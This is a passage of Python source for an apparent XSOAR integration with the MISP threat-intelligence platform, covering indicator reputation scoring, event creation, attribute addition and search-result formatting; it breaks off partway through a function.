# type: ignore from typing import Union, List, Dict from urllib.parse import urlparse import urllib3 from pymisp import ExpandedPyMISP, PyMISPError, MISPObject, MISPSighting, MISPEvent, MISPAttribute from pymisp.tools import GenericObjectGenerator import copy from pymisp.tools import FileObject from CommonServerPython import * logging.getLogger("pymisp").setLevel(logging.CRITICAL) def handle_connection_errors(error): if "SSLError" in error: return_error('Unable to connect to MISP because of a SSLCertVerificationError, ' 'Please try to use the Trust any certificate option.') if "NewConnectionError" in error: return_error('Unable to connect to MISP because of a NewConnectionError, ' 'Please make sure your MISP server url is correct.') if "Please make sure the API key and the URL are correct" in error: return_error('Unable to connect to MISP, ' 'Please make sure the API key is correct.') return_error(error) def warn(*args): """ Do nothing with warnings """ pass # Disable requests warnings urllib3.disable_warnings() # Disable python warnings warnings.warn = warn ''' GLOBALS/PARAMS ''' params = demisto.params() if not params.get('credentials') or not (MISP_API_KEY := params.get('credentials', {}).get('password')): raise DemistoException('Missing API Key. Fill in a valid key in the integration configuration.') MISP_URL = params.get('url') VERIFY = not params.get('insecure') PROXIES = handle_proxy() # type: ignore try: PYMISP = ExpandedPyMISP(url=MISP_URL, key=MISP_API_KEY, ssl=VERIFY, proxies=PROXIES) except PyMISPError as e: handle_connection_errors(e.message) PREDEFINED_FEEDS = { 'CIRCL': {'name': 'CIRCL OSINT Feed', 'url': 'https://www.circl.lu/doc/misp/feed-osint', 'format': 'misp', 'input': 'network'}, 'Botvrij.eu': {'name': 'The Botvrij.eu Data', 'url': 'http://www.botvrij.eu/data/feed-osint', 'format': 'misp', 'input': 'network'} } THREAT_LEVELS_TO_ID = { 'High': 1, 'Medium': 2, 'Low': 3, 'Unknown': 4 } MISP_ENTITIES_TO_CONTEXT_DATA = { 'deleted': 'Deleted', 'category': 'Category', 'comment': 'Comment', 'uuid': 'UUID', 'sharing_group_id': 'SharingGroupID', 'timestamp': 'LastChanged', 'to_ids': 'ToIDs', 'value': 'Value', 'event_id': 'EventID', 'ShadowAttribute': 'ShadowAttribute', 'disable_correlation': 'DisableCorrelation', 'distribution': 'Distribution', 'type': 'Type', 'id': 'ID', 'date': 'CreationDate', 'info': 'Info', 'published': 'Published', 'attribute_count': 'AttributeCount', 'proposal_email_lock': 'ProposalEmailLock', 'locked': 'Locked', 'publish_timestamp': 'PublishTimestamp', 'event_creator_email': 'EventCreatorEmail', 'name': 'Name', 'analysis': 'Analysis', 'threat_level_id': 'ThreatLevelID', 'old_id': 'OldID', 'org_id': 'OrganizationID', 'Org': 'Organization', 'Orgc': 'OwnerOrganization', 'orgc_uuid': 'OwnerOrganization.UUID', 'orgc_id': 'OwnerOrganization.ID', 'orgc_name': 'OwnerOrganization.Name', 'event_uuid': 'EventUUID', 'proposal_to_delete': 'ProposalToDelete', 'description': 'Description', 'version': 'Version', 'Object': 'Object', 'object_id': 'ObjectID', 'object_relation': 'ObjectRelation', 'template_version': 'TemplateVersion', 'template_uuid': 'TemplateUUID', 'meta-category': 'MetaCategory', 'decay_score': 'DecayScore', 'first_seen': 'first_seen', 'last_seen': 'last_seen', 'provider': 'Provider', 'source_format': 'SourceFormat', 'url': 'URL', 'event_uuids': 'EventUUIDS', } MISP_ANALYSIS_TO_IDS = { 'initial': 0, 'ongoing': 1, 'completed': 2 } MISP_DISTRIBUTION_TO_IDS = { 'Your_organization_only': 0, 'This_community_only': 1, 'Connected_communities': 2, 
'All_communities': 3, 'Inherit_event': 5 } SIGHTING_TYPE_NAME_TO_ID = { 'sighting': 0, 'false_positive': 1, 'expiration': 2 } SIGHTING_TYPE_ID_TO_NAME = { '0': 'sighting', '1': 'false_positive', '2': 'expiration' } INDICATOR_TYPE_TO_DBOT_SCORE = { 'FILE': DBotScoreType.FILE, 'URL': DBotScoreType.URL, 'DOMAIN': DBotScoreType.DOMAIN, 'IP': DBotScoreType.IP, 'EMAIL': DBotScoreType.EMAIL, } DOMAIN_REGEX = ( r"([a-z¡-\uffff0-9](?:[a-z¡-\uffff0-9-]{0,61}" "[a-z¡-\uffff0-9])?(?:\\.(?!-)[a-z¡-\uffff0-9-]{1,63}(?<!-))*" "\\.(?!-)(?!(jpg|jpeg|exif|tiff|tif|png|gif|otf|ttf|fnt|dtd|xhtml|css" "|html)$)(?:[a-z¡-\uffff-]{2,63}|xn--[a-z0-9]{1,59})(?<!-)\\.?$" "|localhost)" ) MISP_SEARCH_ARGUMENTS = [ 'value', 'type', 'category', 'org', 'tags', 'from', 'to', 'event_id', 'uuid', 'to_ids', 'last', 'include_decay_score', 'include_sightings', 'include_correlations', 'limit', 'page', 'enforceWarninglist', 'include_feed_correlations', ] EVENT_FIELDS = [ 'id', 'orgc_id', 'org_id', 'date', 'threat_level_id', 'info', 'published', 'uuid', 'analysis', 'attribute_count', 'timestamp', 'distribution', 'proposal_email_lock', 'locked', 'publish_timestamp', 'sharing_group_id', 'disable_correlation', 'event_creator_email', 'Org', 'Orgc', 'RelatedEvent', 'Galaxy', 'Tag', 'decay_score', 'Object', 'Feed', ] ATTRIBUTE_FIELDS = [ 'id', 'event_id', 'object_id', 'object_relation', 'category', 'type', 'to_ids', 'uuid', 'timestamp', 'distribution', 'sharing_group_id', 'comment', 'deleted', 'disable_correlation', 'first_seen', 'last_seen', 'value', 'Event', 'Object', 'Galaxy', 'Tag', 'decay_score', 'Sighting', ] def extract_error(error: list) -> List[dict]: """ Extracting errors raised by PYMISP into readable response, for more information and examples please see UT: test_extract_error. Args: error: list of responses from error section Returns: List[Dict[str, any]]: filtered response """ return [{ 'code': err[0], 'message': err[1].get('message'), 'errors': err[1].get('errors') } for err in error] def dict_to_generic_object_format(args: dict) -> List[dict]: """ Converts args dict into a list, please see GenericObjectGenerator Class in Pymisp. Args: args: dictionary describes MISP object Returns: list: list containing dicts that GenericObjectGenerator can take. 
Examples: >>> {'ip': '8.8.8.8', 'domain': 'google.com'} [{'ip': '8.8.8.8'}, {'domain': 'google.com'}] """ return [{k: v} for k, v in args.items()] def build_generic_object(template_name: str, args: List[dict]) -> GenericObjectGenerator: """ Args: template_name: template name as described in https://github.com/MISP/misp-objects args: arguments to create the generic object Returns: GenericObjectGenerator: object created in MISP Example: args should look like: [{'analysis_submitted_at': '2018-06-15T06:40:27'}, {'threat_score': {value=95, to_ids=False}}, {'permalink': 'https://panacea.threatgrid.com/mask/samples/2e445ef5389d8b'}, {'heuristic_raw_score': 7.8385159793597}, {'heuristic_score': 96}, {'original_filename': 'juice.exe'}, {'id': '2e445ef5389d8b'}] # guardrails-disable-line """ misp_object = GenericObjectGenerator(template_name) misp_object.generate_attributes(args) return misp_object def misp_convert_timestamp_to_date_string(timestamp: Union[str, int]) -> str: """ Gets a timestamp from a MISP response (e.g. 1546713469) and converts it to a human readable format """ return datetime.utcfromtimestamp(int(timestamp)).strftime('%Y-%m-%dT%H:%M:%SZ') if timestamp else "" def replace_keys_from_misp_to_context_data(obj_to_build: Union[dict, list, str]) -> Union[dict, list, str]: """ Replacing keys from MISP's format to Demisto's (as they appear in MISP_ENTITIES_TO_CONTEXT_DATA) Args: obj_to_build (Union[dict, list, str]): object to replace keys in Returns: Union[dict, list, str]: the same object type that was passed in """ if isinstance(obj_to_build, list): return [replace_keys_from_misp_to_context_data(item) for item in obj_to_build] if isinstance(obj_to_build, dict): return { (MISP_ENTITIES_TO_CONTEXT_DATA[key] if key in MISP_ENTITIES_TO_CONTEXT_DATA else key): replace_keys_from_misp_to_context_data(value) for key, value in obj_to_build.items() } return obj_to_build def reputation_command_to_human_readable(outputs, score, events_to_human_readable): found_tag_id, found_tag_name = "", "" for event in events_to_human_readable: # removing those fields as they are shared by the events found_tag_id = event.pop('Tag_ID') found_tag_name = event.pop('Tag_Name') return { 'Attribute Type': outputs[0].get('Type'), 'Dbot Score': score, 'Attribute Value': outputs[0].get('Value'), 'Attribute Category': outputs[0].get('Category'), 'Timestamp': outputs[0].get('Timestamp'), 'Events with the scored tag': events_to_human_readable, 'Scored Tag ID': found_tag_id, 'Scored Tag Name': found_tag_name, } def limit_tag_output_to_id_and_name(attribute_dict, is_event_level): """ As the tag list can be full of unnecessary data, we want to limit this list to include only the ID and Name fields. In addition, returns a set of the found tag ids. Some tags have a field called inherited. When it is set to 1 it says that it is an event's tag. Otherwise (if it is set to 0 or does not exist) it says that it is an attribute's tag. If the data is an event's (is_event_level = true) we would like to add to tag_set_ids all the tags (event ones and the event's attribute tag ones, as they are part of the event scope). If the data is an attribute's (is_event_level = false), and the tag is only related to an attribute, we would like to add it to tag_set_ids. In any other case, we won't add the tag. Args: attribute_dict (dict): The dictionary that includes the tag list. is_event_level (bool): Whether the attribute_dict was received from an event object, meaning the tags are the event's ones. Otherwise, the data is an attribute's (attribute tags). 
""" output = [] tag_set_ids = set() tags_list = attribute_dict.get('Tag', []) for tag in tags_list: is_event_tag = tag.get('inherited', 0) # field doesn't exist when this is an attribute level, default is '0' tag_id = tag.get('id') if is_event_level: tag_set_ids.add(tag_id) else: # attribute level if not is_event_tag: tag_set_ids.add(tag_id) output.append({'ID': tag_id, 'Name': tag.get('name')}) return output, tag_set_ids def parse_response_reputation_command(misp_response, malicious_tag_ids, suspicious_tag_ids, attributes_limit): """ After getting all the attributes which match the required indicator value, this function parses the response. This function goes over all the attributes that found (after limit the attributes amount to the given limit) and by sub-functions calculated the score of the indicator. For the context data outputs, for every attribute we remove the "Related Attribute" list and limits the tags and galaxies lists. Eventually, the outputs will be a list of attributes along with their events objects. Note: When limits the attributes amount, we sort the attributes list by the event ids as the greater event ids are the newer ones. Returns: response (dict): The parsed outputs to context data (array of attributes). score: the indicator score found_tag: the tag (id) which made the indicator to get that score found_related_events (dict): contains info (name, id, threat level id) about all the events that include the indicator Please see an example for a response in test_data/reputation_command_response.json Please see an example for a parsed output in test_data/reputation_command_outputs.json """ response = copy.deepcopy(misp_response) attributes_list = response.get('Attribute') if not attributes_list: return None attributes_list = sorted(attributes_list, key=lambda attribute_item: attribute_item['event_id'], reverse=True)[:attributes_limit] found_related_events, attributes_tag_ids, event_tag_ids = prepare_attributes_array_to_context_data(attributes_list) attribute_in_event_with_bad_threat_level = found_event_with_bad_threat_level_id(found_related_events) score, found_tag = get_score(attribute_tags_ids=attributes_tag_ids, event_tags_ids=event_tag_ids, malicious_tag_ids=malicious_tag_ids, suspicious_tag_ids=suspicious_tag_ids, is_attribute_in_event_with_bad_threat_level=attribute_in_event_with_bad_threat_level) formatted_response = replace_keys_from_misp_to_context_data({'Attribute': attributes_list}) return formatted_response, score, found_tag, found_related_events def prepare_attributes_array_to_context_data(attributes_list): attributes_tag_ids, event_tag_ids = set(), set() found_related_events = {} if not attributes_list: return None for attribute in attributes_list: attribute.pop("RelatedAttribute") # get rid of this useless list event = attribute.get('Event') convert_timestamp_to_readable(attribute, event) found_related_events[event.get("id")] = {"Event Name": event.get("info"), "Threat Level ID": event.get('threat_level_id'), "Event ID": event.get("id")} if event.get('Tag'): limit_tag_output, tag_ids = limit_tag_output_to_id_and_name(event, True) event['Tag'] = limit_tag_output event_tag_ids.update(tag_ids) if attribute.get('Tag'): limit_tag_output, tag_ids = limit_tag_output_to_id_and_name(attribute, False) attribute['Tag'] = limit_tag_output attributes_tag_ids.update(tag_ids) return found_related_events, attributes_tag_ids, event_tag_ids def convert_timestamp_to_readable(attribute, event): if attribute.get('timestamp'): attribute['timestamp'] = 
misp_convert_timestamp_to_date_string(attribute.get('timestamp')) if event: if event.get('timestamp'): attribute['Event']['timestamp'] = misp_convert_timestamp_to_date_string(event.get('timestamp')) if event.get('publish_timestamp'): attribute['Event']['publish_timestamp'] = misp_convert_timestamp_to_date_string( event.get('publish_timestamp')) def found_event_with_bad_threat_level_id(found_related_events): bad_threat_level_ids = ["1", "2", "3"] for event in found_related_events.values(): if event['Threat Level ID'] in bad_threat_level_ids: return True return False def get_score(attribute_tags_ids, event_tags_ids, malicious_tag_ids, suspicious_tag_ids, is_attribute_in_event_with_bad_threat_level): """ Calculates the indicator score by the following logic. Indicators of attributes and Events that: * have tags which are configured as malicious will be scored 3 (i.e. malicious). * have tags which are configured as suspicious will be scored 2 (i.e. suspicious). * don't have any tags configured as suspicious or malicious will be scored by their event's threat level id. In such a case, the score will be BAD if the threat level id is in [1,2,3]. Otherwise, the threat level is 4 = Unknown. note: - In case the same tag appears in both the Malicious tag ids and the Suspicious tag ids lists, the indicator will be scored as malicious. - Attribute tags (both malicious and suspicious) are stronger than events' tags. """ found_tag = None is_attribute_tag_malicious = any((found_tag := tag) in attribute_tags_ids for tag in malicious_tag_ids) if is_attribute_tag_malicious: return Common.DBotScore.BAD, found_tag is_attribute_tag_suspicious = any((found_tag := tag) in attribute_tags_ids for tag in suspicious_tag_ids) if is_attribute_tag_suspicious: return Common.DBotScore.SUSPICIOUS, found_tag is_event_tag_malicious = any((found_tag := tag) in event_tags_ids for tag in malicious_tag_ids) if is_event_tag_malicious: return Common.DBotScore.BAD, found_tag is_event_tag_suspicious = any((found_tag := tag) in event_tags_ids for tag in suspicious_tag_ids) if is_event_tag_suspicious: return Common.DBotScore.SUSPICIOUS, found_tag # no tag was found if is_attribute_in_event_with_bad_threat_level: return Common.DBotScore.BAD, None return Common.DBotScore.NONE, None def get_new_misp_event_object(args): """ Create a new MISP event object and set the event's details. 
""" event = MISPEvent() event.distribution = MISP_DISTRIBUTION_TO_IDS[args.get('distribution')] threat_level_id_arg = args.get('threat_level_id') if threat_level_id_arg: event.threat_level_id = THREAT_LEVELS_TO_ID[threat_level_id_arg] analysis_arg = args.get('analysis') event.analysis = MISP_ANALYSIS_TO_IDS.get(analysis_arg) if analysis_arg in MISP_ANALYSIS_TO_IDS else analysis_arg event.info = args.get('info') if args.get('info') else 'Event from XSOAR' event.date = datetime.today() event.published = argToBoolean(args.get('published', 'False')) return event def create_event_command(demisto_args: dict): """Creating event in MISP with the given attribute args""" new_event = get_new_misp_event_object(demisto_args) new_event = PYMISP.add_event(new_event, True) if isinstance(new_event, dict) and new_event.get('errors'): raise DemistoException(new_event.get('errors')) event_id = new_event.id add_attribute(event_id=event_id, internal=True, new_event=new_event, demisto_args=demisto_args) event = PYMISP.search(eventid=event_id) human_readable = f"## MISP create event\nNew event with ID: {event_id} has been successfully created.\n" return CommandResults( readable_output=human_readable, outputs_prefix='MISP.Event', outputs_key_field='ID', outputs=build_events_search_response(event), raw_response=event ) def add_attribute(event_id: int = None, internal: bool = False, demisto_args: dict = {}, new_event: MISPEvent = None): """Adding attribute to a given MISP event object This function can be called as an independence command or as part of another command (create event for example) Args: event_id (int): Event ID to add attribute to internal (bool): if set to True, will not post results to Demisto demisto_args (dict): Demisto args new_event (MISPEvent): When this function was called from create event command, the attrubite will be added to that existing event. """ attributes_args = { 'id': demisto_args.get('event_id'), # misp event id 'type': demisto_args.get('type', 'other'), 'category': demisto_args.get('category', 'External analysis'), 'to_ids': argToBoolean(demisto_args.get('to_ids', True)), 'comment': demisto_args.get('comment'), 'value': demisto_args.get('value') } event_id = event_id if event_id else arg_to_number(demisto_args.get('event_id'), "event_id") attributes_args.update({'id': event_id}) if event_id else None distribution = demisto_args.get('distribution') attributes_args.update({'distribution': MISP_DISTRIBUTION_TO_IDS[distribution]}) if distribution else None if not new_event: response = PYMISP.search(eventid=event_id, pythonify=True) if not response: raise DemistoException( f"Error: An event with the given id: {event_id} was not found in MISP. 
please check it once again") new_event = response[0] # response[0] is MISP event new_event.add_attribute(**attributes_args) PYMISP.update_event(event=new_event) if internal: return value = attributes_args.get('value') updated_event = PYMISP.search(eventid=new_event.id, controller='attributes', value=value) human_readable = f"## MISP add attribute\nNew attribute: {value} was added to event id {new_event.id}.\n" return CommandResults( readable_output=human_readable, outputs_prefix='MISP.Attribute', outputs_key_field='ID', outputs=build_attributes_search_response(updated_event), raw_response=updated_event ) def generic_reputation_command(demisto_args, reputation_type, dbot_type, malicious_tag_ids, suspicious_tag_ids, reliability, attributes_limit): reputation_value_list = argToList(demisto_args.get(reputation_type), ',') command_results = [] for value in reputation_value_list: command_results.append( get_indicator_results(value, dbot_type, malicious_tag_ids, suspicious_tag_ids, reliability, attributes_limit)) return command_results def reputation_value_validation(value, dbot_type): if dbot_type == 'FILE': # hashFormat will be used only in output hash_format = get_hash_type(value) if hash_format == 'Unknown': raise DemistoException('Invalid hash length, enter file hash of format MD5, SHA-1 or SHA-256') if dbot_type == 'IP': if not is_ip_valid(value): raise DemistoException(f"Error: The given IP address: {value} is not valid") if dbot_type == 'DOMAIN': if not re.compile(DOMAIN_REGEX, regexFlags).match(value): raise DemistoException(f"Error: The given domain: {value} is not valid") if dbot_type == 'URL': if not re.compile(urlRegex, regexFlags).match(value): raise DemistoException(f"Error: The given url: {value} is not valid") if dbot_type == 'EMAIL': if not re.compile(emailRegex, regexFlags).match(value): raise DemistoException(f"Error: The given email address: {value} is not valid") def get_indicator_results(value, dbot_type, malicious_tag_ids, suspicious_tag_ids, reliability, attributes_limit): """ This function searches for the given attribute value in MISP and then calculates it's dbot score. The score is calculated by the tags ids (attribute tags and event tags). Args: value (str): The indicator value (an IP address, email address, domain, url or file hash). dbot_type (str): Indicator type (file, url, domain, email or ip). malicious_tag_ids (set): Tag ids should be recognised as malicious. suspicious_tag_ids (set): Tag ids should be recognised as suspicious reliability (DBotScoreReliability): integration reliability score. attributes_limit (int) : Limits the number of attributes that will be written to the context Returns: CommandResults includes all the indicator results. 
""" reputation_value_validation(value, dbot_type) misp_response = PYMISP.search(value=value, controller='attributes', include_context=True, include_correlations=True, include_event_tags=True, enforce_warninglist=True, include_decay_score=True, includeSightings=True) indicator_type = INDICATOR_TYPE_TO_DBOT_SCORE[dbot_type] is_indicator_found = misp_response and misp_response.get('Attribute') if is_indicator_found: outputs, score, found_tag, found_related_events = parse_response_reputation_command(misp_response, malicious_tag_ids, suspicious_tag_ids, attributes_limit) dbot = Common.DBotScore(indicator=value, indicator_type=indicator_type, score=score, reliability=reliability, malicious_description="Match found in MISP") indicator = get_dbot_indicator(dbot_type, dbot, value) all_attributes = outputs.get('Attribute') events_to_human_readable = get_events_related_to_scored_tag(all_attributes, found_tag) attribute_highlights = reputation_command_to_human_readable(all_attributes, score, events_to_human_readable) readable_output = tableToMarkdown(f'Results found in MISP for value: {value}', attribute_highlights, removeNull=True) readable_output += tableToMarkdown('Related events', list(found_related_events.values())) return CommandResults(indicator=indicator, raw_response=misp_response, outputs=all_attributes, outputs_prefix='MISP.Attribute', outputs_key_field='ID', readable_output=readable_output) else: dbot = Common.DBotScore(indicator=value, indicator_type=indicator_type, score=Common.DBotScore.NONE, reliability=reliability, malicious_description="No results were found in MISP") indicator = get_dbot_indicator(dbot_type, dbot, value) return CommandResults(indicator=indicator, readable_output=f"No attributes found in MISP for value: {value}") def get_events_related_to_scored_tag(all_attributes, found_tag): """ This function searches for all the events that have the tag (i.e found_tag) which caused the indicator to be scored as malicious or suspicious. Args: all_attributes (dict): The parsed response from the MISP search attribute request found_tag (str): The tag that was scored as malicious or suspicious. If no tag was found, then the score is Unknown so no events should be found. Returns: list includes all the events that were detected as related to the tag. """ scored_events = [] if found_tag: for attribute in all_attributes: event = attribute.get('Event', {}) event_name = event.get('Info') scored_events.extend(search_events_with_scored_tag(event, found_tag, event_name)) scored_events.extend(search_events_with_scored_tag(attribute, found_tag, event_name)) return remove_duplicated_related_events(scored_events) def remove_duplicated_related_events(related_events): related_events_no_duplicates = [] for i in range(len(related_events)): if related_events[i] not in related_events[i + 1:]: related_events_no_duplicates.append(related_events[i]) return related_events_no_duplicates def search_events_with_scored_tag(object_data_dict, found_tag, event_name): """ By the given object we go over all the tags and search if found_tag is one of it's tags. If so, the event will be added to related_events list Args: object_data_dict (dict): Event or attribute dict which includes tags list. found_tag (str): The tag that was scored as malicious or suspicious. 
event_name (str): Name of the event """ related_events = [] object_tags_list = object_data_dict.get('Tag', []) for tag in object_tags_list: if tag.get('ID') == found_tag: event_id = get_event_id(object_data_dict) tag_name = tag.get('Name') related_events.append({'Event_ID': event_id, 'Event_Name': event_name, 'Tag_Name': tag_name, 'Tag_ID': tag.get('ID')}) return related_events def get_event_id(data_dict): if data_dict.get('EventID'): return data_dict.get('EventID') elif data_dict.get('ID'): return data_dict.get('ID') return data_dict.get('Event', {}).get('ID') def get_dbot_indicator(dbot_type, dbot_score, value): if dbot_type == "FILE": hash_type = get_hash_type(value) if hash_type == 'md5': return Common.File(dbot_score=dbot_score, md5=value) if hash_type == 'sha1': return Common.File(dbot_score=dbot_score, sha1=value) if hash_type == 'sha256': return Common.File(dbot_score=dbot_score, sha256=value) if dbot_type == "IP": return Common.IP(ip=value, dbot_score=dbot_score) if dbot_type == "DOMAIN": return Common.Domain(domain=value, dbot_score=dbot_score) if dbot_type == "EMAIL": return Common.EMAIL(address=value, dbot_score=dbot_score) if dbot_type == "URL": return Common.URL(url=value, dbot_score=dbot_score) def build_misp_complex_filter(demisto_query: str): """ Examples are available in UT: test_build_misp_complex_filter. For more information please see build_complex_query in pymisp/api.py Args: demisto_query: a complex query containing saved words: 'AND:', 'OR:' and 'NOT:' using ',' as delimiter for parameters and ';' as delimiter for operators. Using the operators is optional. If 'demisto_query' does not contain any of the complex operators, the original input will be returned Returns: str: a query built for MISP to perform a complex search, or the original input if no complex query was found """ regex_and = r'(AND:)([^\;]+)(;)?' regex_or = r'(OR:)([^\;]+)(;)?' regex_not = r'(NOT:)([^\;]+)(;)?' 
misp_query_params = dict() match_and = re.search(regex_and, demisto_query, re.MULTILINE) match_or = re.search(regex_or, demisto_query, re.MULTILINE) match_not = re.search(regex_not, demisto_query, re.MULTILINE) is_complex_and_operator = is_misp_complex_search_helper(match_and, misp_query_params, 'and_parameters') is_complex_or_operator = is_misp_complex_search_helper(match_or, misp_query_params, 'or_parameters') is_complex_not_operator = is_misp_complex_search_helper(match_not, misp_query_params, 'not_parameters') is_complex_search = is_complex_and_operator or is_complex_or_operator or is_complex_not_operator if is_complex_search: return PYMISP.build_complex_query(**misp_query_params) return demisto_query def is_misp_complex_search_helper(match_operator, misp_query_params, operator_key): is_complex_search = False if match_operator is not None: misp_query_params[operator_key] = match_operator.group(2).split(',') is_complex_search = True return is_complex_search def prepare_args_to_search(controller): demisto_args = demisto.args() args_to_misp_format = {arg: demisto_args[arg] for arg in MISP_SEARCH_ARGUMENTS if arg in demisto_args} # Replacing keys and values from Demisto to Misp's keys if 'type' in args_to_misp_format: args_to_misp_format['type_attribute'] = args_to_misp_format.pop('type') if 'to_ids' in args_to_misp_format: args_to_misp_format['to_ids'] = 1 if demisto_args.get('to_ids') == 'true' else 0 if 'from' in args_to_misp_format: args_to_misp_format['date_from'] = args_to_misp_format.pop('from') if 'to' in args_to_misp_format: args_to_misp_format['date_to'] = args_to_misp_format.pop('to') if 'event_id' in args_to_misp_format: args_to_misp_format['eventid'] = argToList(args_to_misp_format.pop('event_id')) if 'last' in args_to_misp_format: args_to_misp_format['publish_timestamp'] = args_to_misp_format.pop('last') if 'include_decay_score' in args_to_misp_format: args_to_misp_format['include_decay_score'] = 1 if demisto_args.get('include_decay_score') == 'true' else 0 if 'include_sightings' in args_to_misp_format: args_to_misp_format['include_sightings'] = 1 if demisto_args.get('include_sightings') == 'true' else 0 if 'include_correlations' in args_to_misp_format: args_to_misp_format['include_correlations'] = 1 if demisto_args.get('include_correlations') == 'true' else 0 if 'enforceWarninglist' in args_to_misp_format: args_to_misp_format['enforceWarninglist'] = 1 if demisto_args.get('enforceWarninglist') == 'true' else 0 if 'include_feed_correlations' in args_to_misp_format: args_to_misp_format['includeFeedCorrelations'] = 1 if demisto_args.get( 'include_feed_correlations') == 'true' else 0 args_to_misp_format.pop('include_feed_correlations') if 'limit' not in args_to_misp_format: args_to_misp_format['limit'] = '50' if 'tags' in args_to_misp_format: args_to_misp_format['tags'] = build_misp_complex_filter(args_to_misp_format['tags']) args_to_misp_format['controller'] = controller demisto.debug(f"[MISP V3]: args for {demisto.command()} command are {args_to_misp_format}") return args_to_misp_format def build_attributes_search_response(response: Union[dict, requests.Response], include_correlations=False) -> dict: """ Convert the response of attribute search returned from MISP to the context output format. 
""" response_object = copy.deepcopy(response) if include_correlations: # return full related attributes only if the user wants to get them back ATTRIBUTE_FIELDS.append('RelatedAttribute') if isinstance(response_object, str): response_object = json.loads(json.dumps(response_object)) attributes = response_object.get('Attribute') return get_limit_attribute_search_outputs(attributes) def get_limit_attribute_search_outputs(attributes): for i in range(len(attributes)): attributes[i] = {key: attributes[i].get(key) for key in ATTRIBUTE_FIELDS if key in attributes[i]} build_galaxy_output(attributes[i]) build_tag_output(attributes[i]) build_sighting_output_from_attribute_search_response(attributes[i]) convert_timestamp_to_readable(attributes[i], None) formatted_attributes = replace_keys_from_misp_to_context_data(attributes) return formatted_attributes def build_galaxy_output(given_object): """given_object is attribute or event, depends on the called function""" if given_object.get('Galaxy'): given_object['Galaxy'] = [ { 'name': star.get('name'), 'type': star.get('type'), 'description': star.get('description') } for star in given_object['Galaxy'] ] def build_object_output(event): if event.get('Object'): event['Object'] = [ { 'name': event_object.get('name'), 'uuid': event_object.get('uuid'), 'description': event_object.get('description'), 'id': event_object.get('id') } for event_object in event['Object'] ] def build_tag_output(given_object): """given_object is attribute or event, depends on the called function""" if given_object.get('Tag'): given_object['Tag'] = [ {'Name': tag.get('name'), 'is_galaxy': tag.get('is_galaxy') } for tag in given_object.get('Tag') ] def build_sighting_output_from_attribute_search_response(attribute): if attribute.get('Sighting'): attribute['Sighting'] = [ {'type': sighting.get('type') } for sighting in attribute.get('Sighting') ] def build_attributes_search_response_return_only_values(response_object: Union[dict, requests.Response]) -> list: """returns list of attributes' values that match the search query when user set the arg 'compact' to True""" if isinstance(response_object, str): response_object = json.loads(json.dumps(response_object)) attributes = response_object.get('Attribute') return [attribute.get('value') for attribute in attributes] def pagination_args_validation(page, limit): if page and page < 0: raise DemistoException("page should be zero or a positive number") if limit and limit < 0: raise DemistoException("limit should be zero or a positive number") def attribute_response_to_markdown_table(response: dict): attribute_highlights = [] for attribute in response: event = attribute.get('Event', {}) attribute_tags = [tag.get('Name') for tag in attribute.get('Tag')] if attribute.get( 'Tag') else None attribute_sightings = [SIGHTING_TYPE_ID_TO_NAME[sighting.get('Type')] for sighting in attribute.get('Sighting')] if attribute.get('Sighting') else None attribute_highlights.append({ 'Attribute ID': attribute.get('ID'), 'Event ID': attribute.get('EventID'), 'Attribute Category': attribute.get('Category'), 'Attribute Type': attribute.get('Type'), 'Attribute Comment': attribute.get('Comment'), 'Attribute Value': attribute.get('Value'), 'Attribute Tags': attribute_tags, 'Attribute Sightings': attribute_sightings, 'To IDs': attribute.get('ToIDs'), 'Timestamp': attribute.get('Timestamp'), 'Event Info': event.get('Info'), 'Event Organization ID': event.get('OrganizationID'), 'Event Distribution': event.get('Distribution'), 'Event UUID': event.get('UUID') }) return 
attribute_highlights def search_attributes(demisto_args: dict) -> CommandResults: """Execute a MISP search over 'attributes'""" args = prepare_args_to_search('attributes') outputs_should_include_only_values = argToBoolean(demisto_args.get('compact', False)) include_correlations = argToBoolean(demisto_args.get('include_correlations', False)) page = arg_to_number(demisto_args.get('page', 1), "page", required=True) limit = arg_to_number(demisto_args.get('limit', 50), "limit", required=True) pagination_args_validation(page, limit) response = PYMISP.search(**args) if response: if outputs_should_include_only_values: response_for_context = build_attributes_search_response_return_only_values(response) number_of_results = len(response_for_context) md = tableToMarkdown(f"MISP search-attributes returned {number_of_results} attributes", response_for_context[:number_of_results], ["Value"]) else: response_for_context = build_attributes_search_response(response, include_correlations) attribute_highlights = attribute_response_to_markdown_table(response_for_context) pagination_message = f"Current page size: {limit}\n" if len(response_for_context) == limit: pagination_message += f"Showing page {page}; additional pages may exist" else: pagination_message += f"Showing page {page}" md = tableToMarkdown( f"MISP search-attributes returned {len(response_for_context)} attributes\n {pagination_message}", attribute_highlights, removeNull=True) return CommandResults( raw_response=response, readable_output=md, outputs=response_for_context, outputs_prefix="MISP.Attribute", outputs_key_field="ID" ) else: return CommandResults(readable_output=f"No attributes found in MISP for the given filters: {args}") def build_events_search_response(response: Union[dict, requests.Response]) -> dict: """ Convert the response of event search returned from MISP to the context output format. Please note: attributes are excluded from the search-events output as the information is too big. Users can use the search-attributes command in order to get the information about the attributes. 
""" response_object = copy.deepcopy(response) if isinstance(response_object, str): response_object = json.loads(json.dumps(response_object)) events = [event.get('Event') for event in response_object] for i in range(0, len(events)): # Filter object from keys in event_args events[i] = {key: events[i].get(key) for key in EVENT_FIELDS if key in events[i]} events[i]['RelatedEvent'] = [] # there is no need in returning related event when searching for an event build_galaxy_output(events[i]) build_tag_output(events[i]) build_object_output(events[i]) events[i]['timestamp'] = misp_convert_timestamp_to_date_string(events[i].get('timestamp')) events[i]['publish_timestamp'] = misp_convert_timestamp_to_date_string(events[i].get('publish_timestamp')) formatted_events = replace_keys_from_misp_to_context_data(events) # type: ignore return formatted_events # type: ignore def event_to_human_readable_tag_list(event): event_tags = event.get('Tag', []) if event_tags: return [tag.get('Name') for tag in event_tags] def event_to_human_readable_galaxy_list(event): event_galaxies = event.get('Galaxy', []) if event_galaxies: return [galaxy.get('Name') for galaxy in event.get('Galaxy')] def event_to_human_readable_object_list(event): event_objects = event.get('Object', []) if event_objects: return [event_object.get('ID') for event_object in event.get('Object')] def event_to_human_readable(response: dict): event_highlights = [] for event in response: event_tags = event_to_human_readable_tag_list(event) event_galaxies = event_to_human_readable_galaxy_list(event) event_objects = event_to_human_readable_object_list(event) event_highlights.append({ 'Event ID': event.get('ID'), 'Event Tags': event_tags, 'Event Galaxies': event_galaxies, 'Event Objects': event_objects, 'Publish Timestamp': event.get('PublishTimestamp'), 'Event Info': event.get('Info'), 'Event Org ID': event.get('OrganizationID'), 'Event Orgc ID': event.get('OwnerOrganization.ID'), 'Event Distribution': event.get('Distribution'), 'Event 